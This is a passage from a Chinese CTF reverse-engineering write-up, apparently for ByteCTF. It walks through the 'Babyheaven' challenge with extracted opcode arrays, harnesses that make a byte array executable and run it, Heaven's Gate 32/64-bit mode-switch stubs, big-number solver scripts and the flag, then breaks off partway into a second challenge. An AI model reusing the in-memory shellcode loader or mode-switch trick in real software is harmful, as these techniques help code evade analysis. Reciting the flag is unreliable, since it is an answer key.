\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x98\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x54\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x60\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x98\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x44\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x80\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x39\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc2\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x75\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x17\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x83\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x3b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x44\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x7c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xcf\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xeb\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x90\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4c\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x3b\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x85\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x44\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x7d\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe9\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xde\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xfd\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xff\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xff\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x90\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xeb\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x90\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x81\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xd8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x5f\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x5d\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc3\x83\x45\xcc\x1\x8b\x45\xc8\x89\x45\xcc\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x81\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x1\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x90\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x6a\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x23\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xe8\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x83\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x24\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x7\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x48\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xcb\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\xc2\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x4\x83\x45\xcc\x1\x8b\x45\xcc\xc6\x0\x0\x83\x45\xcc\x1\x8d\x85\x88\xfe\xff\xff\x89\x44\x24\xc\xc7\x44\x24\x8\x40\x0\x0\x0\x8b\x45\xd0\x89\x44\x24\x4\x8b\x45\xcc\x89\x4\x24\x8b\x45\xe0\xff\xd0\x83\xec\x10\xc7\x85\x68\xfe\xff\xff\x42\x79\x74\x65\xc7\x85\x6c\xfe\xff\xff\x43\x54\x46\x7b\xc7\x85\x70\xfe\xff\xff\x0\x0\x0\x0\xc7\x85\x74\xfe\xff\xff\x0\x0\x0\x0\xc7\x85\x78\xfe\xff\xff\x7d\x0\x0\x0\xc7\x85\x7c\xfe\xff\xff\x0\x0\x0\x0\xc7\x85\x80\xfe\xff\xff\x0\x0\x0\x0\xc7\x85\x84\xfe\xff\xff\x0\x0\x0\x0\xc7\x85\x60\xfe\xff\xff\x0\x0\x0\x0\xc7\x85\x64\xfe\xff\xff\x0\x0\x0\x0\x8d\x85\x60\xfe\xff\xff\x8d\x95\x68\xfe\xff\xff\x8d\x8d\x68\xfe\xff\xff\x83\xc1\x8\x8b\x5d\xd4\x6a\x0\xff\xb5\xbc\xfe\xff\xff\x6a\x0\x50\x52\x6a\x0\xff\xb5\xbc\xfe\xff\xff\x51\xff\xb5\xb4\xfe\xff\xff\x53\xff\xb5\x8c\xfe\xff\xff\xff\xb5\xb8\xfe\xff\xff\xc3";

typedef void (*FUNC_POINT)(void);

int main()
{
    MessageBoxA(0, 0, 0, 0);
    printf("hello world");
    ((FUNC_POINT)function)();
    return 0;
}

编译之后能直接进函数F5,可以看到大致流程

题目名称为Babyheaven,了解到了天堂之门 Heaven's Gate ,该题程序流程和地球人的看雪博客里面差不多。

主要分析的东西就在opcode里面,opcode有三个部分,分别是32切64,主要函数,64切32,先提opcode,然后和刚才一样编译一下,提取的时候中间指针直接+0x100 然后有一个回跳的步骤

#include <stdio.h>
#include <Windows.h>

unsigned char function[] = "\x55\x57\x48\x81\xec\xd8\x1\x0\x0\x48\x8d\xac\x24\x80\x0\x0\x0\x48\x89\x8d\x70\x1\x0\x0\x48\x8d\x55\x60\xb8\x0\x0\x0\x0\xb9\x1b\x0\x0\x0\x48\x89\xd7\xf3\x48\xab\x48\x89\xfa\x89\x2\x48\x83\xc2\x4\xc7\x45\x60\x5\x0\x0\x0\xc7\x45\x64\x12\x0\x0\x0\xc7\x45\x68\xe\x0\x0\x0\xc7\x45\x6c\x17\x0\x0\x0\xc7\x45\x70\x9\x0\x0\x0\xc7\x45\x74\xf\x0\x0\x0\xc7\x45\x78\x4\x0\x0\x0\xc7\x45\x7c\x15\x0\x0\x0\xc7\x85\x80\x0\x0\x0\xa\x0\x0\x0\xc7\x85\x84\x0\x0\x0\x14\x0\x0\x0\xc7\x85\x88\x0\x0\x0\x13\x0\x0\x0\xc7\x85\x8c\x0\x0\x0\x19\x0\x0\x0\xc7\x85\x90\x0\x0\x0\x18\x0\x0\x0\xc7\x85\x94\x0\x0\x0\x16\x0\x0\x0\xc7\x85\x98\x0\x0\x0\xc\x0\x0\x0\xc7\x85\x9c\x0\x0\x0\x10\x0\x0\x0\xc7\x85\xa0\x0\x0\x0\x2\x0\x0\x0\xc7\x85\xa4\x0\x0\x0\x11\x0\x0\x0\xc7\x85\xa8\x0\x0\x0\x7\x0\x0\x0\xc7\x85\xac\x0\x0\x0\x1\x0\x0\x0\xc7\x85\xb0\x0\x0\x0\x8\x0\x0\x0\xc7\x85\xb4\x0\x0\x0\xb\x0\x0\x0\xc7\x85\xb8\x0\x0\x0\x6\x0\x0\x0\xc7\x85\xbc\x0\x0\x0\xd\x0\x0\x0\xc7\x85\xc0\x0\x0\x0\x3\x0\x0\x0\x48\x8d\x55\x80\xb8\x0\x0\x0\x0\xb9\x1b\x0\x0\x0\x48\x89\xd7\xf3\x48\xab\x48\x89\xfa\x89\x2\x48\x83\xc2\x4\xc7\x45\x80\x5\x0\x0\x0\xc7\x45\x84\x12\x0\x0\x0\xc7\x45\x88\xe\x0\x0\x0\xc7\x45\x8c\x17\x0\x0\x0\xc7\x45\x90\xb\x0\x0\x0\xc7\x45\x94\x11\x0\x0\x0\xc7\x45\x98\xc\x0\x0\x0\xc7\x45\x9c\x4\x0\x0\x0\xc7\x45\xa0\x19\x0\x0\x0\xc7\x45\xa4\x18\x0\x0\x0\xc7\x45\xa8\x1\x0\x0\x0\xc7\x45\xac\x14\x0\x0\x0\xc7\x45\xb0\x13\x0\x0\x0\xc7\x45\xb4\xf\x0\x0\x0\xc7\x45\xb8\xd\x0\x0\x0\xc7\x45\xbc\xa\x0\x0\x0\xc7\x45\xc0\x6\x0\x0\x0\xc7\x45\xc4\x15\x0\x0\x0\xc7\x45\xc8\x7\x0\x0\x0\xc7\x45\xcc\x16\x0\x0\x0\xc7\x45\xd0\x8\x0\x0\x0\xc7\x45\xd4\x3\x0\x0\x0\xc7\x45\xd8\x9\x0\x0\x0\xc7\x45\xdc\x2\x0\x0\x0\xc7\x45\xe0\x10\x0\x0\x0\xc7\x85\x44\x1\x0\x0\x19\x0\x0\x0\x48\x8b\x85\x70\x1\x0\x0\x48\xc7\x0\x0\x0\x0\x0\x48\x8b\x85\x70\x1\x0\x0\x48\x8b\x0\x48\x8d\x50\x1\x48\x8b\x85\x70\x1\x0\x0\x48\x89\x10\x8b\x85\x44\x1\x0\x0\x83\xe8\x1\x89\x85\x4c\x1\x0\x0\xeb\x26\x8b\x85\x4c\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x83\xe8\x1\x48\x98\x8b\x44\x85\x60\x39\xc2\x7f\x12\x83\xad\x4c\x1\x0\x0\x1\x83\xbd\x4c\x1\x0\x0\x0\x7f\xd1\xeb\x1\x90\x83\xbd\x4c\x1\x0\x0\x0\xf\x8e\xba\x1\x0\x0\x8b\x85\x44\x1\x0\x0\x83\xe8\x1\x89\x85\x48\x1\x0\x0\xeb\x26\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x83\xe8\x1\x48\x98\x8b\x44\x85\x60\x39\xc2\x7f\x17\x83\xad\x48\x1\x0\x0\x1\x8b\x85\x48\x1\x0\x0\x3b\x85\x4c\x1\x0\x0\x7d\xcc\xeb\x1\x90\x8b\x85\x4c\x1\x0\x0\x83\xe8\x1\x48\x98\x8b\x4c\x85\x60\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x83\xe8\x1\x31\xd1\x48\x63\xd0\x89\x4c\x95\x60\x48\x98\x8b\x54\x85\x60\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x44\x85\x60\x31\xc2\x8b\x85\x48\x1\x0\x0\x48\x98\x89\x54\x85\x60\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x4c\x85\x60\x8b\x85\x4c\x1\x0\x0\x83\xe8\x1\x48\x98\x8b\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x83\xe8\x1\x31\xca\x48\x98\x89\x54\x85\x60\x8b\x85\x44\x1\x0\x0\x83\xe8\x1\x89\x85\x48\x1\x0\x0\xe9\x80\x0\x0\x0\x8b\x85\x4c\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x44\x85\x60\x31\xc2\x8b\x85\x4c\x1\x0\x0\x48\x98\x89\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x44\x85\x60\x31\xc2\x8b\x85\x48\x1\x0\x0\x48\x98\x89\x54\x85\x60\x8b\x85\x48\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x48\x98\x8b\x44\x85\x60\x31\xc2\x8b\x85\x4c\x1\x0\x0\x48\x98\x89\x54\x85\x60\x83\x85\x4c\x1\x0\x0\x1\x83\xad\x48\x1\x0\x0\x1\x8b\x85\x4c\x1\x0\x0\x3b\x85\x48\x1\x0\x0\xf\x8c\x6e\xff\xff\xff\xc7\x85\x4c\x1\x0\x0\x0\x0\x0\x0\xeb\x23\x8b\x85\x4c\x1\x0\x0\x48\x98\x8b\x54\x85\x60\x8b\x85\x4c\x1\x0\x0\x48\x98\x8b\x44\x85\x80\x39\xc2\x75\x17\x83\x85\x4c\x1\x0\x0\x1\x8b\x85\x4c\x1\x0\x0\x3b\x85\x44\x1\x0\x0\x7c\xcf\xeb\x1\x90\x8b\x85\x4c\x1\x0\x0\x3b\x85\x44\x1\x0\x0\x7d\x8\xe9\xde\xfd\xff\xff\x90\xeb\x1\x90\x48\x81\xc4\xd8\x1\x0\x0\x5f\x5d\xc3";
typedef void (*FUNC_POINT)(void);

int main()
{
    DWORD old;
    VirtualProtect(&function, 0x1000, PAGE_EXECUTE_READWRITE, &old);
    MessageBoxA(0, 0, 0, 0);
    printf("hello world");
    ((FUNC_POINT)function)();
    return 0;
}
// 32 切 64
push    33h ; '3'
call    $+5
add     [esp+10h+var_10], 5
retf
// 64 切 32
push    23h ; '#'
call    $+5
add     qword ptr [esp], 7
retfq

函数里面实现了一个排序功能(倒序),但是复杂是o(n!),执行次数对__int64取模就是大括号中间的值。

通过尝试发现如果是一个n阶的正序序列,经过次算法得到倒序序列,刚好需要n!步,而此题需要的是从一个序列状态到另一个序列状态的步骤数。

设求解的是从状态A到状态B,那么N(A-B) = N(A-0) - N(B-0) 0表示的是完全倒序状态。由此问题变为了求解某个状态到0状态的步骤数。

上述问题又可以拆分为以下子问题:假设当前一个n阶序列,第一个元素随机,后n-1个元素已经倒序,求当前状态到n个元素倒序的状态需要的步数。要是对原本的程序不做修改,只是输出当前序列的状态的话,可以发现此时的第一个元素是逐渐变大,由此可以连蒙带猜得出子问题的结论 N(步数) = (n-1)! * N(后n-1个元素中,大于第一个元素的个数)

然后就倒腾一下脚本就出来了。

因为子问题的步骤数爆__int64,所以随便找了份高精度。

#include<stdio.h>
#include<string.h>
#include<algorithm>
#include<iostream>

#define MAXN 1000

using namespace std;

struct HP  
{  
    int len,s[MAXN];  
    HP()  
    {  
        memset(s,0,sizeof(s));  
        len=1;  
    }  

    HP operator =(const char *num) //字符串赋值  
    {  
        len=strlen(num);  
        for(int i=0;i<len;i++) s[i]=num[len-i-1]-'0';  
    }  

    HP operator =(int num) //int 赋值  
    {  
        char s[MAXN];  
        sprintf(s,"%d",num);  
        *this=s;  
        return *this;  
    }  

    HP(int num) { *this=num;}  

    HP(const char*num) {*this=num;}  

    string str()const //转化成string  
    {  
        string res="";  
        for(int i=0;i<len;i++) res=(char)(s[i]+'0')+res;  
        if(res=="") res="0";  
        return res;  
    }  

    HP operator +(const HP& b) const  
    {  
        HP c;  
        c.len=0;  
        for(int i=0,g=0;g||i<max(len,b.len);i++)  
        {  
        int x=g;  
        if(i<len) x+=s[i];  
        if(i<b.len) x+=b.s[i];  
        c.s[c.len++]=x%10;  
        g=x/10;  
        }  
        return c;  
    }  
    void clean()  
    {  
        while(len > 1 && !s[len-1]) len--;  
    }  

    HP operator *(const HP& b)  
    {  
        HP c;  
        c.len=len+b.len;  
        for(int i=0;i<len;i++)  
        for(int j=0;j<b.len;j++)  
            c.s[i+j]+=s[i]*b.s[j];  
        for(int i=0;i<c.len-1;i++)  
        {  
        c.s[i+1]+=c.s[i]/10;  
        c.s[i]%=10;  
        }  
        c.clean();  
        return c;  
    }  

    HP operator - (const HP& b)  
    {  
        HP c;  
        c.len = 0;  
        for(int i=0,g=0;i<len;i++)  
        {  
        int x=s[i]-g;  
        if(i<b.len) x-=b.s[i];  
        if(x>=0)  
            g=0;  
        else  
        {  
            g=1;  
            x+=10;  
        }  
        c.s[c.len++]=x;  
        }  
        c.clean();  
        return c;  
    }  
    HP operator / (const HP &b)  
    {  
        HP c, f = 0;  
        for(int i = len-1; i >= 0; i--)  
        {  
            f = f*10;  
            f.s[0] = s[i];  
            while(f>=b)  
            {  
                f =f-b;  
                c.s[i]++;  
            }  
        }  
        c.len = len;  
        c.clean();  
        return c;  
    }  
     HP operator % (const HP &b)  
    {  
        HP r = *this / b;  
        r = *this - r*b;  
        return r;  
    }  

     HP operator /= (const HP &b)  
    {  
        *this  = *this / b;  
        return *this;  
    }  


    HP operator %= (const HP &b)  
    {  
        *this = *this % b;  
        return *this;  
    }  

    bool operator < (const HP& b) const  
    {  
        if(len != b.len) return len < b.len;  
        for(int i = len-1; i >= 0; i--)  
        if(s[i] != b.s[i]) return s[i] < b.s[i];  
            return false;  
    }  

    bool operator > (const HP& b) const  
    {  
        return b < *this;  
    }  

    bool operator <= (const HP& b)  
    {  
        return !(b < *this);  
    }  

    bool operator == (const HP& b)  
    {  
        return !(b < *this) && !(*this < b);  
    }  
    bool operator != (const HP &b)  
    {  
        return !(*this == b);  
    }  
    HP operator += (const HP& b)  
    {  
        *this = *this + b;  
        return *this;  
    }  
    bool operator >= (const HP &b)  
    {  
        return *this > b || *this == b;  
    }  


};  

istream& operator >>(istream &in, HP& x)  
{  
  string s;  
  in >> s;  
  x = s.c_str();  
  return in;  
}  

ostream& operator <<(ostream &out, const HP& x)  
{  
  out << x.str();  
  return out;  
}  

int v4[25] = {0};
int v5 = 25,i,j;
HP tot = 0;

HP jc(int n)
{
    HP res = 1;
    HP N = n,i = 1,n1 = 1;
    for(;i<=N;i += n1)
    {
        res = res * i;
    }
    return res;
}

bool cmp(int a,int b)
{
    return a>b;
}

int main()
{
    v4[0] = 5;
  v4[1] = 18;
  v4[2] = 14;
  v4[3] = 23;
  v4[4] = 9;
  v4[5] = 15;
  v4[6] = 4;
  v4[7] = 21;
  v4[8] = 10;
  v4[9] = 20;
  v4[10] = 19;
  v4[11] = 25;
  v4[12] = 24;
  v4[13] = 22;
  v4[14] = 12;
  v4[15] = 16;
  v4[16] = 2;
  v4[17] = 17;
  v4[18] = 7;
  v4[19] = 1;
  v4[20] = 8;
  v4[21] = 11;
  v4[22] = 6;
  v4[23] = 13;
  v4[24] = 3;

    while(1)
    {

        for ( i = v5 - 1; i > 0; --i )
            if ( v4[i] > v4[i - 1] )                // 倒着找 找第一个大于前一位的 满足单调不升
                break;

        if ( i <= 0 )                               // 如果单调上升则跳出循环
            break;
        if(i == v5-1 )
        {
            tot += 1LL;
            sort(v4+i-1,v4+v5,cmp);
            continue;
        }

        for ( j = v5 - 1; j >= i && v4[j] <= v4[i - 1]; --j ); // 倒着找 找到后面 第一个大于它的
        // i-1         j     
        int now_n = v5 - i;
        int k = j - i + 1;
        HP K = k;
        tot += jc(now_n) * K; // llllllllllllllllllllllllllllllllllll
        sort(v4+i-1,v4+v5,cmp);
        printf("%d %d \n",i,j);
    }
    cout << tot << endl;
    return 0;
}
#include<stdio.h>
#include<string.h>
#include<algorithm>
#include<iostream>

#define MAXN 1000

using namespace std;

struct HP  
{  
    int len,s[MAXN];  
    HP()  
    {  
        memset(s,0,sizeof(s));  
        len=1;  
    }  

    HP operator =(const char *num) //字符串赋值  
    {  
        len=strlen(num);  
        for(int i=0;i<len;i++) s[i]=num[len-i-1]-'0';  
    }  

    HP operator =(int num) //int 赋值  
    {  
        char s[MAXN];  
        sprintf(s,"%d",num);  
        *this=s;  
        return *this;  
    }  

    HP(int num) { *this=num;}  

    HP(const char*num) {*this=num;}  

    string str()const //转化成string  
    {  
        string res="";  
        for(int i=0;i<len;i++) res=(char)(s[i]+'0')+res;  
        if(res=="") res="0";  
        return res;  
    }  

    HP operator +(const HP& b) const  
    {  
        HP c;  
        c.len=0;  
        for(int i=0,g=0;g||i<max(len,b.len);i++)  
        {  
        int x=g;  
        if(i<len) x+=s[i];  
        if(i<b.len) x+=b.s[i];  
        c.s[c.len++]=x%10;  
        g=x/10;  
        }  
        return c;  
    }  
    void clean()  
    {  
        while(len > 1 && !s[len-1]) len--;  
    }  

    HP operator *(const HP& b)  
    {  
        HP c;  
        c.len=len+b.len;  
        for(int i=0;i<len;i++)  
        for(int j=0;j<b.len;j++)  
            c.s[i+j]+=s[i]*b.s[j];  
        for(int i=0;i<c.len-1;i++)  
        {  
        c.s[i+1]+=c.s[i]/10;  
        c.s[i]%=10;  
        }  
        c.clean();  
        return c;  
    }  

    HP operator - (const HP& b)  
    {  
        HP c;  
        c.len = 0;  
        for(int i=0,g=0;i<len;i++)  
        {  
        int x=s[i]-g;  
        if(i<b.len) x-=b.s[i];  
        if(x>=0)  
            g=0;  
        else  
        {  
            g=1;  
            x+=10;  
        }  
        c.s[c.len++]=x;  
        }  
        c.clean();  
        return c;  
    }  
    HP operator / (const HP &b)  
    {  
        HP c, f = 0;  
        for(int i = len-1; i >= 0; i--)  
        {  
            f = f*10;  
            f.s[0] = s[i];  
            while(f>=b)  
            {  
                f =f-b;  
                c.s[i]++;  
            }  
        }  
        c.len = len;  
        c.clean();  
        return c;  
    }  
     HP operator % (const HP &b)  
    {  
        HP r = *this / b;  
        r = *this - r*b;  
        return r;  
    }  

     HP operator /= (const HP &b)  
    {  
        *this  = *this / b;  
        return *this;  
    }  


    HP operator %= (const HP &b)  
    {  
        *this = *this % b;  
        return *this;  
    }  

    bool operator < (const HP& b) const  
    {  
        if(len != b.len) return len < b.len;  
        for(int i = len-1; i >= 0; i--)  
        if(s[i] != b.s[i]) return s[i] < b.s[i];  
            return false;  
    }  

    bool operator > (const HP& b) const  
    {  
        return b < *this;  
    }  

    bool operator <= (const HP& b)  
    {  
        return !(b < *this);  
    }  

    bool operator == (const HP& b)  
    {  
        return !(b < *this) && !(*this < b);  
    }  
    bool operator != (const HP &b)  
    {  
        return !(*this == b);  
    }  
    HP operator += (const HP& b)  
    {  
        *this = *this + b;  
        return *this;  
    }  
    bool operator >= (const HP &b)  
    {  
        return *this > b || *this == b;  
    }  


};  

istream& operator >>(istream &in, HP& x)  
{  
  string s;  
  in >> s;  
  x = s.c_str();  
  return in;  
}  

ostream& operator <<(ostream &out, const HP& x)  
{  
  out << x.str();  
  return out;  
}  

int v3[25] = {0};
int v5 = 25,i,j;
HP tot = 0;

HP jc(int n)
{
    HP res = 1;
    HP N = n,i = 1,n1 = 1;
    for(;i<=N;i += n1)
    {
        res = res * i;
    }
    return res;
}

bool cmp(int a,int b)
{
    return a>b;
}

int main()
{
  v3[0] = 5;
  v3[1] = 18;
  v3[2] = 14;
  v3[3] = 23;
  v3[4] = 11;
  v3[5] = 17;
  v3[6] = 12;
  v3[7] = 4;
  v3[8] = 25;
  v3[9] = 24;
  v3[10] = 1;
  v3[11] = 20;
  v3[12] = 19;
  v3[13] = 15;
  v3[14] = 13;
  v3[15] = 10;
  v3[16] = 6;
  v3[17] = 21;
  v3[18] = 7;
  v3[19] = 22;
  v3[20] = 8;
  v3[21] = 3;
  v3[22] = 9;
  v3[23] = 2;
  v3[24] = 16;

    while(1)
    {

        for ( i = v5 - 1; i > 0; --i )
            if ( v3[i] > v3[i - 1] )                // 倒着找 找第一个大于前一位的 满足单调不升
                break;

        if ( i <= 0 )                               // 如果单调上升则跳出循环
            break;
        if(i == v5-1 )
        {
            tot += 1LL;
            sort(v3+i-1,v3+v5,cmp);
            continue;
        }

        for ( j = v5 - 1; j >= i && v3[j] <= v3[i - 1]; --j ); // 倒着找 找到后面 第一个大于它的
        // i-1         j     
        int now_n = v5 - i;
        int k = j - i + 1;
        HP K = k;
        tot += jc(now_n) * K; // llllllllllllllllllllllllllllllllllll
        sort(v3+i-1,v3+v5,cmp);
        printf("%d %d \n",i,j);
    }
    cout << tot << endl;
    return 0;
}

两个输出求差的绝对值再转字符串就行,最后是大小端的问题需要把字符串倒序。

ByteCTF{Qw021zbG}

A Crack Me

动静结合理一下正向代码,并带入检验且检验成功,可以把原程序丢掉了

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

unsigned char box[24 * 9] =
    {
        0x33, 0x37, 0x64, 0x35, 0x39, 0x66, 0x37, 0x61, 0x32, 0x66,
        0x37, 0x64, 0x63, 0x34, 0x30, 0x63, 0x61, 0x30, 0x34, 0x61,
        0x37, 0x62, 0x30, 0x73, 0x5F, 0x5F, 0xA9, 0x21, 0xFA, 0xED,
        0xF1, 0x36, 0xA6, 0xCD, 0xD9, 0x87, 0x9D, 0x5A, 0x90, 0xD5,
        0x0F, 0x71, 0x67, 0x0E, 0x37, 0xFF, 0xA1, 0x78, 0x58, 0x05,
        0xFD, 0x07, 0x3A, 0xD8, 0x47, 0xBC, 0xD0, 0x04, 0x3E, 0x33,
        0x08, 0x3E, 0xDD, 0x21, 0xB1, 0x71, 0xEB, 0x13, 0x53, 0x5E,
        0x58, 0x05, 0x12, 0x23, 0x77, 0x00, 0x30, 0xCC, 0xA4, 0x2E,
        0x66, 0x4B, 0xD0, 0x56, 0xC7, 0x7D, 0xE9, 0x44, 0x17, 0x76,
        0x47, 0x8A, 0x18, 0x02, 0xD2, 0x26, 0x75, 0xCF, 0x1F, 0xB3,
        0x5E, 0xD7, 0x28, 0x6A, 0x04, 0x7A, 0xEB, 0x61, 0x1F, 0x9F,
        0x61, 0x9C, 0xA8, 0x25, 0x3C, 0x43, 0x6F, 0xCF, 0xD5, 0xAF,
        0xB0, 0x92, 0xDC, 0xD3, 0x61, 0xE7, 0xA4, 0xAA, 0xC2, 0xC2,
        0x3C, 0x57, 0xDD, 0x1A, 0xB3, 0x0B, 0x83, 0x55, 0x16, 0x88,
        0x0D, 0xDD, 0x6E, 0x3D, 0x8F, 0x59, 0x49, 0xCD, 0x2C, 0x8D,
        0x6E, 0x10, 0x6E, 0x53, 0xE5, 0xDA, 0xE2, 0x64, 0x68, 0xE8,
        0x19, 0xA9, 0x60, 0x9C, 0xB5, 0xF2, 0x03, 0xFF, 0xC2, 0xB2,
        0xCC, 0xF1, 0xB3, 0x9C, 0x4E, 0xA1, 0x77, 0xF0, 0xBA, 0x99,
        0x36, 0xC0, 0x42, 0x71, 0xFC, 0x90, 0xBF, 0x72, 0x17, 0xD5,
        0xCD, 0xDF, 0x73, 0xEA, 0x1C, 0xCC, 0x40, 0x9E, 0xCB, 0xAC,
        0x4A, 0x82, 0x84, 0x35, 0x85, 0x97, 0xBE, 0xEA, 0x2E, 0x3A,
        0x83, 0xEA, 0xC5, 0xF2, 0xC5, 0xE0};

unsigned char byte_7FF76BB333A0[] =
    {
        0x00, 0x36, 0x30, 0x0D, 0x0F, 0x12, 0x35, 0x23, 0x19, 0x3F,
        0x2D, 0x34, 0x03, 0x14, 0x29, 0x21, 0x3B, 0x24, 0x02, 0x22,
